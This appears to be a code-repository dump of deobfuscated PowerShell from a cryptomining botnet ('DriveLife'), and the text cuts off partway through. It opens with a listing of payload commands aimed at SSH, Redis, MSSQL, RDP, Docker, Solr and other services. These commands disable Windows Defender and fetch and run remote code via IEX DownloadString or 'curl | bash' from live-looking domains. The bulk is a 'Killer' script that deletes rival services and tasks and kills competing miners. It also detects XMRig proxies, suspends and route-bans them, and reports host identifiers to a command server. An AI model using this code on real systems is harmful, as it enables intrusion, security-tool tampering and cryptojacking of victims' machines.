-------------------------------------------------------------------------------- /DriveLife/powershell-beautiful/domain-include.txt: -------------------------------------------------------------------------------- 1 | if-1.4.ps1:3: $ipc_cmd='cmd /c powershell -e UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgADEAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYwA6AFwAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA & start /b powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''https://t.m7n''+''0y.com/7p.php?2.0*ipc*%username%*%computername%*''+[Environment]::OSVersion.version.Major);bpu (''https://t.m7n''+''0y.com/ipc.jsp?2.0'')' 2 | if-1.4.ps1:4: $ipco_cmd='cmd /c powershell -e UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgADEAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYwA6AFwAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA & start /b powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''https://t.m7n''+''0y.com/7p.php?2.0*ipco*%username%*%computername%*''+[Environment]::OSVersion.version.Major);bpu (''https://t.m7n''+''0y.com/ipco.jsp?2.0'')' 3 | if-1.4.ps1:6: $mssql_cmd='cmd /c powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''https://t.m7n''+''0y.com/ms.jsp?2.0*%computername%'')' 4 | if-1.4.ps1:7: $mssqlo_cmd='cmd /c powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''https://t.m7n''+''0y.com/mso.jsp?2.0*%computername%'')' 5 | if-1.4.ps1:12: $rdp_cmd='cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe&powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IEX(New-Object Net.WebClient).DownloadString(''https://t.m7n''+''0y.com/rdp.jsp?2.0'')' 6 | if-1.4.ps1:13: $rdpo_cmd='cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe&powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IEX(New-Object Net.WebClient).DownloadString(''https://t.m7n''+''0y.com/rdpo.jsp?2.0'')' 7 | if-1.4.ps1:14: $ssh_cmd='export src=ssh;curl -fksSL https://t.m7n0y.com/ln/core.png?ssh*2.0|bash' 8 | if-1.4.ps1:15: $ssho_cmd='export src=ssho;curl -fksSL https://t.m7n0y.com/ln/core.png?ssho*2.0|bash' 9 | if-1.4.ps1:16: $redis_cmd='export src=rds;curl -fksSL https://t.m7n0y.com/ln/core.png?rds*2.0|bash' 10 | if-1.4.ps1:17: $rediso_cmd='export src=rdso;curl -fksSL https://t.m7n0y.com/ln/core.png?rdso*2.0|bash' 11 | if-1.4.ps1:18: $smgh_cmd='cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:/windows/system32/WindowsPowerShell/v1.0/powershell.exe;Add-MpPreference -ExclusionPath c:/ & powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IEx(New-Object Net.WebClient).DownLoadString(''https://t.m7n''+''0y.com/smgh.jsp?2.0*%computername%'')' 12 | if-1.4.ps1:19: $smgho_cmd='cmd /c powershell Add-MpPreference -ExclusionProcess c:/windows/system32/WindowsPowerShell/v1.0/powershell.exe;Add-MpPreference -ExclusionPath c:/&powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IEx(New-Object Net.WebClient).DownLoadString(''https://t.m7n''+''0y.com/smgho.jsp?2.0*%computername%'')' 13 | if-1.4.ps1:20: $yarn_cmd='export src=yarn;curl -fksSL https://t.m7n0y.com/ln/core.png?yarn*2.0|bash' 14 | if-1.4.ps1:21: $yarno_cmd='export src=yarno;curl -fksSL https://t.m7n0y.com/ln/core.png?yarno*2.0|bash' 15 | if-1.4.ps1:22: $logic_cmd='cmd /c powershell -e UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgADEAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYwA6AFwAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA & powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''https://t.m7n''+''0y.com/logic.jsp?2.0*%computername%'')','export src=logic;curl -fksSL https://t.m7n0y.com/ln/core.png?logic*2.0|bash' 16 | if-1.4.ps1:23: $logico_cmd='cmd /c powershell -e UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgADEAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYwA6AFwAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA & powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(''https://t.m7n''+''0y.com/logico.jsp?2.0*%computername%'')','export src=logico;curl -fksSL https://t.m7n0y.com/ln/core.png?logico*2.0|bash' 17 | if-1.4.ps1:24: $es_cmd='cmd /c powershell -e UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgADEAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYwA6AFwAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA & powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IEx(New-Object Net.WebClient).DownLoadString(''https://t.m7n''+''0y.com/es.jsp?2.0*%computername%'')','export src=es;curl -fksSL https://t.m7n0y.com/ln/core.png?es*2.0|bash' 18 | if-1.4.ps1:25: $eso_cmd='cmd /c powershell -e UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgADEAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYwA6AFwAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA & powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IEx(New-Object Net.WebClient).DownLoadString(''https://t.m7n''+''0y.com/eso.jsp?2.0*%computername%'')','export src=eso;curl -fksSL https://t.m7n0y.com/ln/core.png?eso*2.0|bash' 19 | if-1.4.ps1:26: $solr_cmd='cmd /c powershell -e UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgADEAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYwA6AFwAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA & powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IEx(New-Object Net.WebClient).DownLoadString(''https://t.m7n''+''0y.com/solr.jsp?2.0*%computername%'')','export src=solr;curl -fksSL https://t.m7n0y.com/ln/core.png?solr*2.0|bash' 20 | if-1.4.ps1:27: $solro_cmd='cmd /c powershell -e UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgADEAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYwA6AFwAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA & powershell [Net.ServicePointManager]::ServerCertificateValidationCallback={1};IEx(New-Object Net.WebClient).DownLoadString(''https://t.m7n''+''0y.com/solro.jsp?2.0*%computername%'')','export src=solro;curl -fksSL https://t.m7n0y.com/ln/core.png?solro*2.0|bash' 21 | if-1.4.ps1:28: $docker_cmd='export src=docker;curl -fksSL https://t.m7n0y.com/ln/core.png?docker*2.0|bash' 22 | if-1.4.ps1:29: $dockero_cmd='export src=dockero;curl -fksSL https://t.m7n0y.com/ln/core.png?dockero*2.0|bash' 23 | if-1.4.ps1:30: $core_url='https://t.m7n0y.com' 24 | if-1.4.ps1:33: if(!$down_url){$down_url='https://d.bb3u9.com'} 25 | kr-1.3.ps1:1:if(!$down_url){ $down_url = 'http://d.u78wjdu.com' } try{$version=$ifmd5[0..5]-join""}catch{} function isPubIP { Param( [parameter(Mandatory=$true)][String]$ip ) $resIps = @( @(4026531840L, 3758096384L), @(4026531840L, 4026531840L), @(4278190080L, 0L), @(4278190080L, 167772160L), @(4278190080L, 2130706432L), @(4290772992L, 1681915904L), @(4293918720L, 2886729728L), @(4294836224L, 3323068416L), @(4294901760L, 2851995648L), @(4294901760L, 3232235520L), @(4294967040L, 3221225472L), @(4294967040L, 3221225984L), @(4294967040L, 3227017984L), @(4294967040L, 3325256704L), @(4294967040L, 3405803776L), @(4294967295L, 4294967295L) ) $iparr = $ip.split(".") $iplong = 0 for($i=3;$i -ge 0; $i--){ $iplong = $iplong -bor [int]$iparr[3-$i] * [math]::pow(2,8*$i) } for($j=0;$j -lt $resIps.count;$j++){ if(($iplong -band $resIps[$j][0]) -eq $resIps[$j][1]){ return $false } } return $true } function ssl_connect($ip,$port,$send_str){ $ret = "" try{ $socket = New-Object Net.Sockets.TcpClient($ip, $port) $sslStream = New-Object System.Net.Security.SslStream($socket.GetStream(),$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])) $sslStream.ReadTimeout = 5000 $sslStream.AuthenticateAsClient('') $writer = new-object System.IO.StreamWriter($sslStream) $reader = new-object System.IO.StreamReader($sslStream) $writer.WriteLine($send_str) $writer.flush() $ret = $reader.ReadLine() $socket.close() }catch{} return $ret } function raw_connect($ip,$port,$send_str){ try{ $client = NEW-objEcT Net.Sockets.TcpClient($ip,$port) $sock = $client.Client $bytes = [Text.Encoding]::ASCII.GetBytes($send_str) $sock.send(($bytes)) | out-null $sock.ReceiveTimeout = 5000 $res = [Array]::CreateInstance(('byte'), 10000) $recv = $sock.Receive($res) $res = $res[0..($recv-1)] $str = [Text.Encoding]::ASCII.getstring($res) return $str }catch{} return "" } function ishttp($ip,$port){ $data="GET / HTTP/1.1nn" $ret = raw_connect $ip $port $data if($ret.indexOf("HTTP/1") -ne -1){ return $true } return $false } function ishttps($ip,$port){ $data = "GET / HTTP/1.1nn" $ret = ssl_connect $ip $port $data if($ret.indexOf("HTTP/1") -ne -1){ return $true } return $false } function isminerproxy($ip,$port){ $data ='{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":null,"agent":"XMRig/5.13.1","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva"]}}' + "n" $ret = raw_connect $ip $port $data if($ret.indexOf("jsonrpc") -ne -1){ write-host "miner proxy!!" return $true } return $false } function isminerproxys($ip,$port){ $data = '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":null,"agent":"XMRig/5.13.1","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva"]}}' $ret = ssl_connect $ip $port $data if($ret.indexOf("jsonrpc") -ne -1){ write-host "miner proxys!!" return $true } return $false } Add-Type -TypeDefinition 'using System;using System.Diagnostics;using System.Security.Principal;using System.Runtime.InteropServices;public static class Kernel32{[DllImport("kernel32.dll")] public static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess,out bool pbDebuggerPresent);[DllImport("kernel32.dll")] public static extern int DebugActiveProcess(int PID);[DllImport("kernel32.dll")] public static extern int DebugActiveProcessStop(int PID);}' function ProcessSuspend($id){ $procName = (Get-Process -id $id -ErrorAction SilentlyContinue).name if($procName -eq $null){ Write-Host "ERROR: There is no process with an ID of $id" return } Write-host "Attempting to suspend $procName (PID: $id)..." if ($id -le 0) { write-host "You didn't input a positive integer" return } $debug = whoami /priv | Where-Object{$_ -like "*SeDebugPrivilege*"} if($debug -ne $null){ $DebugPresent = [IntPtr]::Zero $out = [Kernel32]::CheckRemoteDebuggerPresent(((Get-Process -Id $id).Handle),[ref]$debugPresent) if ($debugPresent){ write-host "There is already a debugger attached to this process" return } $suspend = [Kernel32]::DebugActiveProcess($id) if ($suspend -eq $false){ write-host "ERROR: Unable to suspend $procName (PID: $id)" } else{ write-host "The $procName process (PID: $id) was successfully suspended!" } } else{ write-host "ERROR: You do not have debugging privileges to pause any process" return } } function gmd5($d){ [Security.Cryptography.MD5]::Create().ComputeHash($d)|foreach{$l+=$_.ToString('x2')} return $l } function getprotected(){ function getrname(){ function gmd5($d){ [Security.Cryptography.MD5]::Create().ComputeHash($d)|foreach{$l+=$_.ToString('x2')} return $l } $rpath="C:\Windows\System32\Windowspowershell\V1.0" $enames = gci "$rpath\*" -Include *.exe -Exclude powershell.exe|foreach{$_.name} $tmd5 = gmd5 ([IO.File]::ReadAllBytes("$rpath\powershell.exe")) foreach($ename in $enames){ $md5_=gmd5 ([IO.File]::ReadAllBytes("$rpath\$ename")) if($tmd5 -eq $md5_){ return $ename } } return "NULLNULL" } $comp_name = $env:COMPUTERNAME $guid = (get-wmiobject Win32_ComputerSystemProduct).UUID $mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-object -first 1 $m6exe=(gmd5 ([system.Text.Encoding]::UTF8.GetBytes($comp_name+$guid+$mac))).substring(0,6) $pids=@() $pids+=Get-WmiObject -Class Win32_Process|Where-Object{$_.path -like '*m6g.bin.exe*' -or $_.path -like '*m6.bin.exe*' -or $_.path -like "*$m6exe*" -or $_.name -eq (getrname)}|foreach{$_.processid} return $pids } function sendmsg($ip,$ismproxy,$mpid){ try{ $mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-object -first 1 $guid = (get-wmiobject Win32_ComputerSystemProduct).UUID $comp_name = $env:COMPUTERNAME if($ip -eq ''){ $url = "$down_url/kl_repo.json?$version&$global:retry&$comp_name&$mac&$guid" } else { $pname = Get-Process -id $mpid | Select-Object -ExpandProperty Name $url = "$down_url/rellik.json?$version&$global:retry&$comp_name&$mac&$guid&$ip&$ismproxy&$mpid&$pname" } (New-Object Net.WebClient).DownloadString($url) }catch{} } function banIp($ip){ route add $ip 0.0.0.0 IF 1 -p } function unbanIp($ip){ route delete $ip 0.0.0.0 } Function Killer { $SrvName = "xWinWpdSrv", "SVSHost", "Microsoft Telemetry", "lsass", "Microsoft", "system", "Oracleupdate", "CLR", "sysmgt", "\gm", "WmdnPnSN", "Sougoudl","National", "Nationaaal", "Natimmonal", "Nationaloll", "Nationalmll","Nationalaie","Nationalwpi","WinHelp32","WinHelp64", "Samserver", "RpcEptManger", "NetMsmqActiv Media NVIDIA", "Sncryption Media Playeq","SxS","WinSvc","mssecsvc2.1","mssecsvc2.0","Windows_Update","Windows Managers","SvcNlauser","WinVaultSvc","Xtfy","Xtfya","Xtfyxxx","360rTys","IPSECS","MpeSvc","SRDSL","WifiService","ALGM","wmiApSrvs","wmiApServs","taskmgr1","WebServers","ExpressVNService","WWW.DDOS.CN.COM","WinHelpSvcs","aspnet_staters","clr_optimization","AxInstSV","Zational","DNS Server","Serhiez","SuperProServer",".Net CLR","WissssssnHelp32","WinHasdadelp32","WinHasdelp32","ClipBooks" write-host "kill services..." foreach($Srv in $SrvName) { $Null = SC.exe Config $Srv Start= Disabled $Null = SC.exe Stop $Srv $Null = SC.exe Delete $Srv } $TaskName = "my1","Mysa", "Mysa1", "Mysa2", "Mysa3", "ok", "Oracle Java", "Oracle Java Update", "Microsoft Telemetry", "Spooler SubSystem Service","Oracle Products Reporter", "Update service for products", "gm", "ngm","Sorry","Windows_Update","Update_windows","WindowsUpdate1","WindowsUpdate2","WindowsUpdate3","AdobeFlashPlayer","FlashPlayer1","FlashPlayer2","FlashPlayer3","IIS","WindowsLogTasks","System Log Security Check","Update","Update1","Update2","Update3","Update4","DNS","SYSTEM","DNS2","SYSTEMa","skycmd","Miscfost","Netframework","Flash","RavTask","GooglePingConfigs","HomeGroupProvider","MiscfostNsi","WwANsvc","Bluetooths","Ddrivers","DnsScan","WebServers","Credentials","TablteInputout","werclpsyport","HispDemorn","LimeRAT-Admin","DnsCore","Update service for Windows Service","DnsCore","ECDnsCore" write-host "kill tasks..." foreach ($Task in $TaskName) { SchTasks.exe /Delete /TN $Task /F 2> $Null } $Miner = "SC","WerMgr","WerFault","DW20","msinfo", "XMR*","xmrig*", "minerd", "MinerGate", "Carbon", "yamm1", "upgeade", "auto-upgeade", "svshost", "SystemIIS", "SystemIISSec", 'WindowsUpdater*', "WindowsDefender*", "update", "carss", "service", "csrsc", "cara", "javaupd", "gxdrv", "lsmosee", "secuams", "SQLEXPRESS_X64_86", "Calligrap", "Sqlceqp", "Setting", "Uninsta", "conhoste","Setring","Galligrp","Imaging","taskegr","Terms.EXE","360","8866","9966","9696","9797","svchosti","SearchIndex","Avira","cohernece","win","SQLforwin","xig*","taskmgr1","Workstation","ress","explores" write-host "kill processes..." foreach ($m in $Miner) { Get-Process -Name $m -ErrorAction SilentlyContinue | Stop-Process -Force } $tm = Get-Process -Name TaskMgr -ErrorAction SilentlyContinue if($tm -eq $null){ Start-Process -WindowStyle hidden -FilePath Taskmgr.exe } $tcpconn = NetStat -anop TCP $ipcache=@('170.187.149.77:80','138.68.186.90:80','176.58.99.231:80','138.68.251.24:80','165.227.62.120:443','202.182.120.192:443','178.62.2.194:443','138.68.4.19:443','176.58.99.231:443','138.68.251.24:443','85.117.234.189:443','159.203.122.42') foreach($tempip in $ipcache){ unbanIp $tempip } $ppids = getprotected write-host "kill connections..." foreach ($t in $tcpconn) { $line = $t.split(' ')| ? {$_} if ($line -eq $null) { continue } if ($t.contains("LISTENING") -and ($line[1].contains("43669") -or $line[1].contains("43668"))) { $ppids += $line[-1] continue } if($t.contains("ESTABLISHED") -and ($line[2].gettype() -eq "".gettype()) -and ($line[2].indexOf(":") -ne -1)){ $ip,$port = $line[2].split(':') $currpid = $line[-1] if(($ipcache -contains $line[2]) -or ($ppids -contains $currpid) -or ($ip.length -lt 4) -or -not(isPubIP $ip) -or ($port -le 0)){ continue } if($global:ipdealcache -contains $line[2]){ ProcessSuspend $currpid banIp $ip continue } write-host "try $ip $port..." if(((ishttp $ip $port) -eq $false) -and ((ishttps $ip $port) -eq $false)){ write-host "end http test..." $ismproxy = 0 if((isminerproxy $ip $port) -eq $true){ $ismproxy = 1 } else{ if((isminerproxys $ip $port) -eq $true){ $ismproxy = 2 } } if($ismproxy -ne 0){ ProcessSuspend $currpid banIp $ip $global:ipdealcache += $line[2] sendmsg $line[2] $ismproxy $currpid } } if($ipcache -notcontains $line[2]){$ipcache += $line[2]} } } $global:retry++ } $start_time=Get-Date -UFormat "%s" $global:ipdealcache=@() $global:retry=0 $ser=[System.Net.Sockets.TcpListener]65529 $ser.start() while($true){ if(((Get-Date -UFormat "%s")-$start_time) -gt 60000) {break} "try to kill..." Killer "kill done..." Start-Sleep -Seconds 600 } 26 | m6-1-0.ps1:782: #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ 27 | m6-1-0.ps1:812: #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ 28 | m6-1-0.ps1:1559: # Site: http://msdn.microsoft.com/en-us/magazine/cc301808.aspx 29 | -------------------------------------------------------------------------------- /DriveLife/powershell-beautiful/kr-1.3.ps1: -------------------------------------------------------------------------------- 1 | if(!$down_url){ 2 | 3 | $down_url = 'http://d.u78wjdu.com' 4 | 5 | } 6 | 7 | try{$version=$ifmd5[0..5]-join""}catch{} 8 | 9 | function isPubIP { 10 | 11 | Param( 12 | 13 | [parameter(Mandatory=$true)][String]$ip 14 | 15 | ) 16 | 17 | $resIps = @( 18 | 19 | @(4026531840L, 3758096384L), 20 | 21 | @(4026531840L, 4026531840L), 22 | 23 | @(4278190080L, 0L), 24 | 25 | @(4278190080L, 167772160L), 26 | 27 | @(4278190080L, 2130706432L), 28 | 29 | @(4290772992L, 1681915904L), 30 | 31 | @(4293918720L, 2886729728L), 32 | 33 | @(4294836224L, 3323068416L), 34 | 35 | @(4294901760L, 2851995648L), 36 | 37 | @(4294901760L, 3232235520L), 38 | 39 | @(4294967040L, 3221225472L), 40 | 41 | @(4294967040L, 3221225984L), 42 | 43 | @(4294967040L, 3227017984L), 44 | 45 | @(4294967040L, 3325256704L), 46 | 47 | @(4294967040L, 3405803776L), 48 | 49 | @(4294967295L, 4294967295L) 50 | 51 | ) 52 | 53 | $iparr = $ip.split(".") 54 | 55 | $iplong = 0 56 | 57 | for($i=3;$i -ge 0; $i--){ 58 | 59 | $iplong = $iplong -bor [int]$iparr[3-$i] * [math]::pow(2,8*$i) 60 | 61 | } 62 | 63 | for($j=0;$j -lt $resIps.count;$j++){ 64 | 65 | if(($iplong -band $resIps[$j][0]) -eq $resIps[$j][1]){ 66 | 67 | return $false 68 | 69 | } 70 | 71 | } 72 | 73 | return $true 74 | 75 | } 76 | 77 | 78 | function ssl_connect($ip,$port,$send_str){ 79 | 80 | $ret = "" 81 | 82 | try{ 83 | 84 | $socket = New-Object Net.Sockets.TcpClient($ip, $port) 85 | 86 | $sslStream = New-Object System.Net.Security.SslStream($socket.GetStream(),$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])) 87 | 88 | $sslStream.ReadTimeout = 5000 89 | 90 | $sslStream.AuthenticateAsClient('') 91 | 92 | $writer = new-object System.IO.StreamWriter($sslStream) 93 | 94 | $reader = new-object System.IO.StreamReader($sslStream) 95 | 96 | $writer.WriteLine($send_str) 97 | 98 | $writer.flush() 99 | 100 | $ret = $reader.ReadLine() 101 | 102 | $socket.close() 103 | 104 | }catch{} 105 | 106 | return $ret 107 | 108 | } 109 | 110 | function raw_connect($ip,$port,$send_str){ 111 | 112 | try{ 113 | 114 | $client = NEW-objEcT Net.Sockets.TcpClient($ip,$port) 115 | 116 | $sock = $client.Client 117 | 118 | $bytes = [Text.Encoding]::ASCII.GetBytes($send_str) 119 | 120 | $sock.send(($bytes)) | out-null 121 | 122 | $sock.ReceiveTimeout = 5000 123 | 124 | $res = [Array]::CreateInstance(('byte'), 10000) 125 | 126 | $recv = $sock.Receive($res) 127 | 128 | $res = $res[0..($recv-1)] 129 | 130 | $str = [Text.Encoding]::ASCII.getstring($res) 131 | 132 | return $str 133 | 134 | }catch{} 135 | 136 | return "" 137 | 138 | } 139 | 140 | function ishttp($ip,$port){ 141 | 142 | $data="GET / HTTP/1.1nn" 143 | 144 | $ret = raw_connect $ip $port $data 145 | 146 | if($ret.indexOf("HTTP/1") -ne -1){ 147 | 148 | return $true 149 | 150 | } 151 | 152 | return $false 153 | 154 | } 155 | 156 | function ishttps($ip,$port){ 157 | 158 | $data = "GET / HTTP/1.1nn" 159 | 160 | $ret = ssl_connect $ip $port $data 161 | 162 | if($ret.indexOf("HTTP/1") -ne -1){ 163 | 164 | return $true 165 | 166 | } 167 | 168 | return $false 169 | 170 | } 171 | 172 | function isminerproxy($ip,$port){ 173 | 174 | $data ='{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":null,"agent":"XMRig/5.13.1","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva"]}}' + "n" 175 | 176 | $ret = raw_connect $ip $port $data 177 | 178 | if($ret.indexOf("jsonrpc") -ne -1){ 179 | 180 | write-host "miner proxy!!" 181 | 182 | return $true 183 | 184 | } 185 | 186 | return $false 187 | 188 | } 189 | 190 | function isminerproxys($ip,$port){ 191 | 192 | $data = '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":null,"agent":"XMRig/5.13.1","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva"]}}' 193 | 194 | $ret = ssl_connect $ip $port $data 195 | 196 | if($ret.indexOf("jsonrpc") -ne -1){ 197 | 198 | write-host "miner proxys!!" 199 | 200 | return $true 201 | 202 | } 203 | 204 | return $false 205 | 206 | } 207 | 208 | Add-Type -TypeDefinition 'using System;using System.Diagnostics;using System.Security.Principal;using System.Runtime.InteropServices;public static class Kernel32{[DllImport("kernel32.dll")] public static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess,out bool pbDebuggerPresent);[DllImport("kernel32.dll")] public static extern int DebugActiveProcess(int 